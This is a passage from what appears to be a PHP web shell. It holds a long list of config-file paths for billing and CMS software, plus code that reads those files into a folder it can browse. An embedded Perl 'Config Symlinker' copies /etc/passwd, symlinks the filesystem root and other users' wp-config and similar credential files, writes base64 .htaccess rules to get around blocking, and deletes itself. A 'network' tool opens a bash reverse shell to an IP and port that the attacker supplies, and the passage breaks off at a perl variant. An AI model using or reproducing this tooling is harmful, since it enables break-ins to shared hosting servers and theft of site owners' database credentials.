823 "$user_docroot/Supportes/submitticket.php" => "WHMCS",
824 "$user_docroot/supportes/submitticket.php" => "WHMCS",
825 "$user_docroot/domains/submitticket.php" => "WHMCS",
826 "$user_docroot/domain/submitticket.php" => "WHMCS",
827 "$user_docroot/Hosting/submitticket.php" => "WHMCS",
828 "$user_docroot/HOSTING/submitticket.php" => "WHMCS",
829 "$user_docroot/hosting/submitticket.php" => "WHMCS",
830 "$user_docroot/CART/submitticket.php" => "WHMCS",
831 "$user_docroot/Cart/submitticket.php" => "WHMCS",
832 "$user_docroot/cart/submitticket.php" => "WHMCS",
833 "$user_docroot/ORDER/submitticket.php" => "WHMCS",
834 "$user_docroot/Order/submitticket.php" => "WHMCS",
835 "$user_docroot/order/submitticket.php" => "WHMCS",
836 "$user_docroot/CLIENT/submitticket.php" => "WHMCS",
837 "$user_docroot/Client/submitticket.php" => "WHMCS",
838 "$user_docroot/client/submitticket.php" => "WHMCS",
839 "$user_docroot/CLIENTAREA/submitticket.php" => "WHMCS",
840 "$user_docroot/Clientarea/submitticket.php" => "WHMCS",
841 "$user_docroot/clientarea/submitticket.php" => "WHMCS",
842 "$user_docroot/SUPPORT/submitticket.php" => "WHMCS",
843 "$user_docroot/Support/submitticket.php" => "WHMCS",
844 "$user_docroot/support/submitticket.php" => "WHMCS",
845 "$user_docroot/BILLING/submitticket.php" => "WHMCS",
846 "$user_docroot/Billing/submitticket.php" => "WHMCS",
847 "$user_docroot/billing/submitticket.php" => "WHMCS",
848 "$user_docroot/BUY/submitticket.php" => "WHMCS",
849 "$user_docroot/Buy/submitticket.php" => "WHMCS",
850 "$user_docroot/buy/submitticket.php" => "WHMCS",
851 "$user_docroot/MANAGE/submitticket.php" => "WHMCS",
852 "$user_docroot/Manage/submitticket.php" => "WHMCS",
853 "$user_docroot/manage/submitticket.php" => "WHMCS",
854 "$user_docroot/CLIENTSUPPORT/submitticket.php" => "WHMCS",
855 "$user_docroot/ClientSupport/submitticket.php" => "WHMCS",
856 "$user_docroot/Clientsupport/submitticket.php" => "WHMCS",
857 "$user_docroot/clientsupport/submitticket.php" => "WHMCS",
858 "$user_docroot/CHECKOUT/submitticket.php" => "WHMCS",
859 "$user_docroot/Checkout/submitticket.php" => "WHMCS",
860 "$user_docroot/checkout/submitticket.php" => "WHMCS",
861 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
862 "$user_docroot/Billings/submitticket.php" => "WHMCS",
863 "$user_docroot/billings/submitticket.php" => "WHMCS",
864 "$user_docroot/BASKET/submitticket.php" => "WHMCS",
865 "$user_docroot/Basket/submitticket.php" => "WHMCS",
866 "$user_docroot/basket/submitticket.php" => "WHMCS",
867 "$user_docroot/SECURE/submitticket.php" => "WHMCS",
868 "$user_docroot/Secure/submitticket.php" => "WHMCS",
869 "$user_docroot/secure/submitticket.php" => "WHMCS",
870 "$user_docroot/SALES/submitticket.php" => "WHMCS",
871 "$user_docroot/Sales/submitticket.php" => "WHMCS",
872 "$user_docroot/sales/submitticket.php" => "WHMCS",
873 "$user_docroot/BILL/submitticket.php" => "WHMCS",
874 "$user_docroot/Bill/submitticket.php" => "WHMCS",
875 "$user_docroot/bill/submitticket.php" => "WHMCS",
876 "$user_docroot/PURCHASE/submitticket.php" => "WHMCS",
877 "$user_docroot/Purchase/submitticket.php" => "WHMCS",
878 "$user_docroot/purchase/submitticket.php" => "WHMCS",
879 "$user_docroot/ACCOUNT/submitticket.php" => "WHMCS",
880 "$user_docroot/Account/submitticket.php" => "WHMCS",
881 "$user_docroot/account/submitticket.php" => "WHMCS",
882 "$user_docroot/USER/submitticket.php" => "WHMCS",
883 "$user_docroot/User/submitticket.php" => "WHMCS",
884 "$user_docroot/user/submitticket.php" => "WHMCS",
885 "$user_docroot/CLIENTS/submitticket.php" => "WHMCS",
886 "$user_docroot/Clients/submitticket.php" => "WHMCS",
887 "$user_docroot/clients/submitticket.php" => "WHMCS",
888 "$user_docroot/BILLINGS/submitticket.php" => "WHMCS",
889 "$user_docroot/Billings/submitticket.php" => "WHMCS",
890 "$user_docroot/billings/submitticket.php" => "WHMCS",
891 "$user_docroot/MY/submitticket.php" => "WHMCS",
892 "$user_docroot/My/submitticket.php" => "WHMCS",
893 "$user_docroot/my/submitticket.php" => "WHMCS",
894 "$user_docroot/secure/whm/submitticket.php" => "WHMCS",
895 "$user_docroot/secure/whmcs/submitticket.php" => "WHMCS",
896 "$user_docroot/panel/submitticket.php" => "WHMCS",
897 "$user_docroot/clientes/submitticket.php" => "WHMCS",
898 "$user_docroot/cliente/submitticket.php" => "WHMCS",
899 "$user_docroot/support/order/submitticket.php" => "WHMCS",
900 "$user_docroot/bb-config.php" => "BoxBilling",
901 "$user_docroot/boxbilling/bb-config.php" => "BoxBilling",
902 "$user_docroot/box/bb-config.php" => "BoxBilling",
903 "$user_docroot/host/bb-config.php" => "BoxBilling",
904 "$user_docroot/Host/bb-config.php" => "BoxBilling",
905 "$user_docroot/supportes/bb-config.php" => "BoxBilling",
906 "$user_docroot/support/bb-config.php" => "BoxBilling",
907 "$user_docroot/hosting/bb-config.php" => "BoxBilling",
908 "$user_docroot/cart/bb-config.php" => "BoxBilling",
909 "$user_docroot/order/bb-config.php" => "BoxBilling",
910 "$user_docroot/client/bb-config.php" => "BoxBilling",
911 "$user_docroot/clients/bb-config.php" => "BoxBilling",
912 "$user_docroot/cliente/bb-config.php" => "BoxBilling",
913 "$user_docroot/clientes/bb-config.php" => "BoxBilling",
914 "$user_docroot/billing/bb-config.php" => "BoxBilling",
915 "$user_docroot/billings/bb-config.php" => "BoxBilling",
916 "$user_docroot/my/bb-config.php" => "BoxBilling",
917 "$user_docroot/secure/bb-config.php" => "BoxBilling",
918 "$user_docroot/support/order/bb-config.php" => "BoxBilling",
919 "$user_docroot/includes/dist-configure.php" => "Zencart",
920 "$user_docroot/zencart/includes/dist-configure.php" => "Zencart",
921 "$user_docroot/products/includes/dist-configure.php" => "Zencart",
922 "$user_docroot/cart/includes/dist-configure.php" => "Zencart",
923 "$user_docroot/shop/includes/dist-configure.php" => "Zencart",
924 "$user_docroot/includes/iso4217.php" => "Hostbills",
925 "$user_docroot/hostbills/includes/iso4217.php" => "Hostbills",
926 "$user_docroot/host/includes/iso4217.php" => "Hostbills",
927 "$user_docroot/Host/includes/iso4217.php" => "Hostbills",
928 "$user_docroot/supportes/includes/iso4217.php" => "Hostbills",
929 "$user_docroot/support/includes/iso4217.php" => "Hostbills",
930 "$user_docroot/hosting/includes/iso4217.php" => "Hostbills",
931 "$user_docroot/cart/includes/iso4217.php" => "Hostbills",
932 "$user_docroot/order/includes/iso4217.php" => "Hostbills",
933 "$user_docroot/client/includes/iso4217.php" => "Hostbills",
934 "$user_docroot/clients/includes/iso4217.php" => "Hostbills",
935 "$user_docroot/cliente/includes/iso4217.php" => "Hostbills",
936 "$user_docroot/clientes/includes/iso4217.php" => "Hostbills",
937 "$user_docroot/billing/includes/iso4217.php" => "Hostbills",
938 "$user_docroot/billings/includes/iso4217.php" => "Hostbills",
939 "$user_docroot/my/includes/iso4217.php" => "Hostbills",
940 "$user_docroot/secure/includes/iso4217.php" => "Hostbills",
941 "$user_docroot/support/order/includes/iso4217.php" => "Hostbills"
942
943 );
944 foreach($getconfig as $config => $userconfig) {
945 $get = file_get_contents($config);
946 if($get == '') {
947 }
948 else {
949 $fopen = fopen("idx_config/$user-$userconfig.txt", "w");
950 fputs($fopen, $get);
951 }
952 }
953 }
954 }
955 }
956 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
957 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_config/' frameborder='0' scrolling='yes'><iframe>";
958 print "</div>";
959 }
960 elseif($toolsname === "symlink") {
961 if(!is_writable(path())) die(color(1, 1, "Directory '".path()."' is not writeable. Can't create directory 'idx_sym'."));
962 if(!is_dir(path()."/idx_sym/")) {
963 $sym['code'] = "#!/usr/bin/perl -I/usr/local/bandmin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#		Name : Perl/CGI Config Symlinker (With Auto Bypass Symlink 404)
#		Version : 1.2
#		Created : 9 Mei 2017
#		Author : 0x1999
#		Thanks To : 0xIDiot , Indonesian Code Party , Jatim4u
#		More Info : http://0xDark.blogspot.com
#		Want to recode ? Don't forget my nick name  :)
#		http://facebook.com/melex.1d
#		
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

use File::Copy;
use strict;
use warnings;
use MIME::Base64;
copy("/etc/passwd","passwd.txt") ;
mkdir "idx_sym";
symlink("/","idx_sym/root");
my $filename = 'passwd.txt';
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkFkZEljb24gJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBQkFBQUFBUUNBWUFBQUFmOC85aEFBQUFCSE5DU1ZRSUNBZ0lmQWhraUFBQUFBbHdTRmx6QUFBTjF3QUFEZGNCUWlpYmVBQUFBQmwwUlZoMFUyOW1kSGRoY21VQWQzZDNMbWx1YTNOallYQmxMbTl5WjV2dVBCb0FBQUZVU1VSQlZEaU5wWks5U2dOQkZJWFB2WE5uZGpjUm9wWDRVNGtXVnI1QUNoVTdIOEJTZkl0QUhrQjlDWHNyVzBHd0VRdFJ3VktNUnRBVThaY1lXYU5tTTJPeHF5eWlZWmRjR0lhWjRaNzdNZWVRY3c2REZBL1VEVUFBWUhIajhoT0FUajlvUlNlMloxZjJLalAxZmdMa25NUFM1bFcwVmk0cFpvcHZIWERXK0loT3I5OWdYVHprcjlxdlRCTXRyTmQ4QXNMVmNvbVpLRFA2MWtFTGloR0lKOVFCZ08yamRzSUUvSmI1T2FjR0ZBd0RRRWVNRU9abmgxRXFNQ2h0U0I4YTY0QlcyTU5oN1FWaWhDR0tjTkhzd21aMGxBa1lIeEY0UWhCUENLSVlSVTlsNjA1S21HQ0VJVVl6dENZTUJma0VqR1o0T2lId1JRRit2a1FHK3B0QUNJRlJFSlZQUUF2RmYrQnJqb3lRK0NaZnFxMTE4RFJGRWhqZWJiYmVsNmRHaXlUcWYrdlNya2FSUS8wdXRMN21IWGw5dnErZVAzVW5iaC9INWdES2lPRjY3WWViWTBkU0pjUkJtMHoyckZsMnlXcDhBVkRJVzMyZGE3cExBQUFBQUVsRlRrU3VRbUNDJyBeXkRJUkVDVE9SWV5eDQpEZWZhdWx0SWNvbiAnZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFCQUFBQUFRQ0FZQUFBQWY4LzloQUFBQUFYTlNSMElBcnM0YzZRQUFBQVppUzBkRUFQOEEvd0Qvb0wybmt3QUFBQWx3U0ZsekFBQUxFd0FBQ3hNQkFKcWNHQUFBQUFkMFNVMUZCOW9KQmhjVEp2MkIyZDRBQUFKTVNVUkJWRGpMYlpPOVRoeFpFSVcvcWx2ZHRNMzhCTmdKUW1RZ0pHZCtBL01RQkx3R2ppd0gzbndka1NMdE8yeEVSRzVMcXhYUlNJUjJZRGZENEdrR00wUDNyYjRiOVBBejBsN3BTbFdsVzBmbm5Mb2xBSVBCNFBYaDRlRnVudWNBSUlMd2RFU2VaeUFpZm5wNit1OW9OTG8zZ00zTnpUZEhSKy8venZKTXpTeUpLS29kaUlnOEFYYXhlSXoxYkRaN014cU5mdGdTVVJEV3k3TFVuWjBkWW14QUZBVkVsSTZBRUN5Z0lzUVFzaXpMQk9BQkFET2pLQXBxaDd1N0dvQ1VXaXdZYmV0b1VIcnJQY3dDcW9GMktVZVhMekV6QnYwK3VRbVNITUVaOUY2U1pjcjZpNElzQk9hL2I3SFFNYUh0SUF3Z0xkSGFsREExZXYwZVFiU2pyRXJRd0pwcUY0ZUF4L2hvcUQxMzJtTWtKcmk1dVNPbEZoRWhwVVFJaW9qd2FtT0ROc2xqZlVXQ3FwTG5PYWFDU0tKdG5hQkNzWllqQWxsbVhJNHZhZW9hVlgwY2JTZGhtVVIzekFLdk5qWTZWaW9vMHRXemdFb25LYlcrS2tHV3QzVW50MENlR2ZKczlnK1VVMHJFR0hIL0h3L01qSDYvVCtQT2RGb1JOS0NoTTIyeG1PUGVzcGpQR1E2SHBOUTI3dDZzQUNEU05hbnlvbGpETEVkVmFGT0xlOFprVWpLNXVrcTN0NzlsUEM3L09EazVHYStZNk81TXF5bU53M1YxeTNoeXpmWDBocXZKTHliWEZkKytmMmQzZDBkbXMrcXZnNE9EejhmSHgwL0xzYmUzOTY0c1M3KzR1RWp1bnBxbVNlNmUzRDNONS9OMFdaYnRseTlmMDluWjJaL2IyOXYyZkxFZXZ2SzlxdjdjMnRvS2k4VWlpUWlxSGJtNnJpVzZhMTNmbit6djczK29xb3JoY0xnS1VGWFZQK2ZuNTIrTG9uajhJTEowUDhaSUNDRjkvUFRwQ2xocEJ2Z1BlbG9MOVU1NU5JQUFBQUFBU1VWT1JLNUNZSUk9Jw0KSW5kZXhJZ25vcmUgKi50eHQ0MDQNCkluZGV4U3R5bGVTaGVldCAnaHR0cDovL2V2ZW50LmluZG94cGxvaXQub3IuaWQvc3ltbGluay5jc3MnDQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKjB4c3ltNDA0IFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $sym = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KSGVhZGVyTmFtZSAweDE5OTkudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAqDQpJbmRleFN0eWxlU2hlZXQgJ2h0dHA6Ly9ldmVudC5pbmRveHBsb2l0Lm9yLmlkL3N5bWxpbmsuY3NzJw==");
open(my $fh1, '>', 'idx_sym/.htaccess');
print $fh1 "$htaccess";
close $fh1;
open(my $xx, '>', 'idx_sym/nemu.txt');
print $xx "$sym";
close $xx;
open(my $fh, '<:encoding(UTF-8)', $filename);
while (my $row = <$fh>) {
my @matches = $row =~ /(.*?):x:/g;
my $usernya = $1;
my @array = (
	{configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' },
	{configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' },
	{configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' },
	{configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' },
	{configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' },
	{configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' },
	{configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' }
);
foreach (@array){
	my $confignya = $_->{configdir};
	my $typeconfig = $_->{type};
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt");
	mkdir "idx_sym/$usernya-$typeconfig.txt";
	symlink("$confignya","idx_sym/$usernya-$typeconfig.txt/0x1999.txt");
	copy("idx_sym/nemu.txt","idx_sym/$usernya-$typeconfig.txt/.htaccess") ;
	}
}
print "Content-type: text/html\n\n";
print "<head><title>Bypass 404 By 0x1999</title></head>";
print '<meta http-equiv="refresh" content="5; url=idx_sym"/>';
print '<body><center><h1>0x1999 Never Die</h1>';
print '<a href="idx_sym">Klik Disini</a>';
unlink($0);";
964 save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
965 exe("perl /tmp/symlink.pl");
966 sleep(1);
967 @unlink("/tmp/symlink.pl");
968 @unlink("passwd.txt");
969 @unlink("idx_sym/pas.txt");
970 @unlink("idx_sym/nemu.txt");
971 }
972
973 print "<div style='background: #ffffff; width: 100%; height: 100%'>";
974 print "<iframe src='http://".$_SERVER['HTTP_HOST']."/".$GLOBALS['FILEPATH']."/idx_sym/' frameborder='0' scrolling='yes'></iframe>";
975 print "</div>";
976 }
977 elseif($toolsname === "network") {
978 $args = explode(" ", $args);
979
980 if($args[0] === "bc") {
981 if(empty($args[1])) die(color(1, 1, "Set Your IP for BackConnect!"));
982 if(empty($args[2])) die(color(1, 1, "Set Your PORT for BackConnect!"));
983 if(empty($args[3])) die(color(1, 1, "Missing type of reverse shell: 'bash', 'perl'."));
984
985 if($args[3] === "bash") {
986 exe("/bin/bash -i >& /dev/tcp/".$args[1]."/".$args[2]." 0>&1");
987 }
988 elseif($args[3] === "perl") {
